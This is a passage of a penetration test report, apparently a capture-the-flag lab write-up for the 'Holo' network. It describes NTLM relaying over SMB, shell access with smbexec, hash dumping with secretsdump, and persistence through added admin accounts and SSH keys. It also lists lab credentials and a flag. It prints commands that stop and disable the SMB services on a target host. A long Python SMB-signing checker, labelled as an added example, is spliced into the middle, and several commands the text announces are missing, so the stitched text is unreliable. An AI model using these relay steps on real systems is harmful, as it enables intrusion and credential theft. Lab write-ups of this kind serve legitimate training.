• An SMB Relay Race – How to Exploit LLMNR and SMB Message Signing for Fun and
Profit
• Remote NTLM Relaying via Meterpreter
• Remote NTLM relaying through meterpreter on Windows port 445
• Execute the commands below to stop the SMB services on 10.200.107.35, which allows us to
intercept and relay the SMB session from our attacker machine.
sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled
Reference: NIST - CVE-2016-2115
System Affected:
• 10.200.107.30
Remediation Owner:
• System Owner
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
exploit the SMB vulnerability on 10.200.107.30 are listed below:
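The recommendation for this finding is to enforce SMB signing, and a defender can verify that from the server's own negotiation: the SecurityMode field of the SMB2 NEGOTIATE response carries a "signing enabled" bit (0x0001) and a "signing required" bit (0x0002), and only the second stops a relayed session. The Python below is an added example, not part of the report; it builds constructed NEGOTIATE responses (not captures from the HOLO network) and parses them into a signing posture, which is the same check a scanner performs on a live reply:

```python
import struct

SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
SMB2_HEADER = "<4sHHIHHIIQIIQ16s"        # 64-byte SMB2 packet header
SMB2_NEGOTIATE_RSP = "<HHHH16sIIIIQQHHI"  # fixed 64-byte part of the response


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed sample server reply for this example (not a capture).
    Header: ProtocolId, StructureSize=64, CreditCharge, Status, Command=0
    (NEGOTIATE), Credits, Flags (bit 0 = server-to-client), NextCommand,
    MessageId, Reserved, TreeId, SessionId, Signature."""
    header = struct.pack(SMB2_HEADER, b"\xfeSMB", 64, 0, 0, 0x0000, 1,
                         0x00000001, 0, 0, 0, 0, 0, b"\x00" * 16)
    # Body: StructureSize=65, SecurityMode, DialectRevision, ContextCount,
    # ServerGuid, Capabilities, MaxTransact/Read/Write, SystemTime,
    # ServerStartTime, SecurityBufferOffset/Length, NegotiateContextOffset.
    body = struct.pack(SMB2_NEGOTIATE_RSP, 65, security_mode, dialect, 0,
                       b"\x11" * 16, 0, 0x800000, 0x800000, 0x800000, 0, 0,
                       128, 0, 0)
    return header + body


def parse_negotiate_response(data: bytes) -> dict:
    """Extract dialect and signing flags from an SMB2 NEGOTIATE response."""
    if len(data) < 128 or data[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 packet (SMB1 replies start with \\xffSMB)")
    hdr = struct.unpack_from(SMB2_HEADER, data, 0)
    command, flags = hdr[4], hdr[6]
    if command != 0 or not flags & 0x1:
        raise ValueError("not a server NEGOTIATE response")
    body = struct.unpack_from(SMB2_NEGOTIATE_RSP, data, 64)
    security_mode, dialect = body[1], body[2]
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }


def signing_posture(data: bytes) -> str:
    """'required' is the only posture under which an authenticated session
    cannot be relayed to this server; the other two need remediation."""
    info = parse_negotiate_response(data)
    if info["signing_required"]:
        return "required"
    if info["signing_enabled"]:
        return "enabled_not_required"
    return "disabled"
```

Against a live host the bytes would be the reply to a NEGOTIATE request sent to port 445; SMB1-only servers answer with a different header and are reported as unsupported rather than misread.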
As we successfully exploited the SMB session with the NTLM relay attack, we decided to use the popular
Impacket tool smbexec, downloaded on our attacker machine, in conjunction with "proxychains" to gain
access to 10.200.107.30.
To use smbexec with proxychains, we added the line below to "/etc/proxychains.conf" on our
attacker machine (we installed proxychains beforehand using the "sudo apt install -y proxychains"
command on our attacker machine).
Once ready, we execute the following command, which launches shell access on 10.200.107.30:
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
gain shell access on 10.200.107.30 are listed below:
We perform the same technique to gain persistent access to the system that was done on
10.200.107.31.
We use Impacket's secretsdump (as an alternative method), downloaded on our attacker machine,
and execute the command below to dump the NTLM hashes:
With this, we have owned the entire Holo corporate network and the Holo domain controller.
Side note: we tried various methods to attack 10.200.107.32; however, the attacks were
unsuccessful.
Maintaining Access
Maintaining access to a system is important to us as attackers; ensuring that we can get back into
a system after it has been exploited is invaluable.
The maintaining access phase of the penetration test focuses on ensuring that once the focused
attack has occurred, we have administrative access over the system again.
Many exploits may only be exploitable once, and we may never be able to get back into a system
after we have already performed the exploit.
Black Sun Security added administrator or root level accounts on all systems compromised. In
addition to the administrative/root access, Black Sun Security added the attacker SSH key to all
compromised systems that have an SSH service running.
House Cleaning
The house cleaning portion of the assessment ensures that remnants of the penetration test are
removed.
Often fragments of tools or user accounts are left on an organization's computers, which can cause
security issues down the road. Ensuring that Black Sun Security is meticulous and that no remnants
of our penetration test are left over is important.
After the penetration test was completed, Black Sun Security removed all user accounts,
passwords, malicious files (including the reverse shell PHP file, mimikatz, PowerShell scripts and the DLL
file), database tables and SSH keys installed on the systems.
Black Sun Security has ensured that all services turned off or disabled during the
assessment are reverted to normal, that the Docker container is up and running (the leftover container
used for privilege escalation was removed) and that any modification of user account groups/permissions is
reverted as well.
HOLO should not have to remove any user accounts or services from the systems.
The HOLO corporate network suffered from a series of improper user input validation issues that led to complete
compromise of the internal network, in which BLACK SUN SECURITY successfully obtained access
with administrative privileges to four (4) systems on the HOLO corporate network.
The objectives of this penetration test were met, as BLACK SUN SECURITY identified and
determined the impact of a potential security breach on the confidentiality of HOLO corporate data and
internal infrastructure.
It is highly recommended that HOLO take immediate action to patch these vulnerabilities as soon
as possible, as they are easily found through basic reconnaissance and exploitable
without much effort (low-hanging fruit).
Appendix 1 – References
Vulnerabilities References
• CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
• CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command
Injection')
• CWE-640: Weak Password Recovery Mechanism for Forgotten Password
• CWE-434: Unrestricted Upload of File with Dangerous Type
• CWE-427: Uncontrolled Search Path Element
• NIST - CVE-2016-2115
• Code Execution via Local File Inclusion
• PortSwigger - Robots.txt file
• CWE-23
• CWE-36
• CWE-184
• CWE-182
• NIST - CVE-2020-28950 Detail
• CVE Detail - CVE-2020-28950
• IBM X-Force Exchange - Anti-Ransomware Tool privilege escalation
• CWE-254: 7PK - Security Features (4.5)
• CVE Details - CVE-2016-2115
• Tenable - SMB Signing not required
• Unrestricted File Upload - OWASP
• CWE-428: Unquoted Search Path or Element
Best Practices
• OWASP Secure Coding Best Practice v2
Tool References
• NTLMRelayx
• SMBexec
• secretsdump
• Generate Backdoor via SQL Injection
• https://gtfobins.github.io/gtfobins/docker/#suid
• applocker bypass checker
• PHP Reverse Shell
Appendix 2 – MITRE ATT&CK Framework
This appendix shows the tactics, techniques and sub-techniques used, which can be correlated with
the actions BLACK SUN SECURITY performed during this assessment.
This is extremely useful and acts as a guide for HOLO to plan and engage improvement of detection
capabilities (or early detection) and response to the threats and risks in the HOLO corporate
environment.
Tactics
• Tactic - TA0001 - Initial Access
• Tactic – TA0002 - Execution
• Tactic – TA0003 - Persistence
• Tactic – TA0004 - Privilege Escalation
• Tactic – TA0005 – Defense Evasion
• Tactic - TA0006 - Credential Access
• Tactic – TA0007 - Discovery
• Tactic – TA0008 - Lateral Movement
• Tactic – TA0040 - Impact
• Tactic - TA0043 - Reconnaissance
http://10.200.107.31 | HOLO{bcfe3bcb8e6897018c63fbec660ff238}
For this assessment, BLACK SUN SECURITY used one (1) Metasploit Meterpreter module on a
single target host, 10.200.107.35.
For this assessment, BLACK SUN SECURITY obtained and leveraged the valid user accounts below:
• admin:DBManagerLogin!
• www-data
• root
• linux-admin
• admin:!123SecureAdminDashboard321!
• gurag
• nt authority\system
• watamet:Nothingtoworry!
• HOLOLIVE/SRV-ADMIN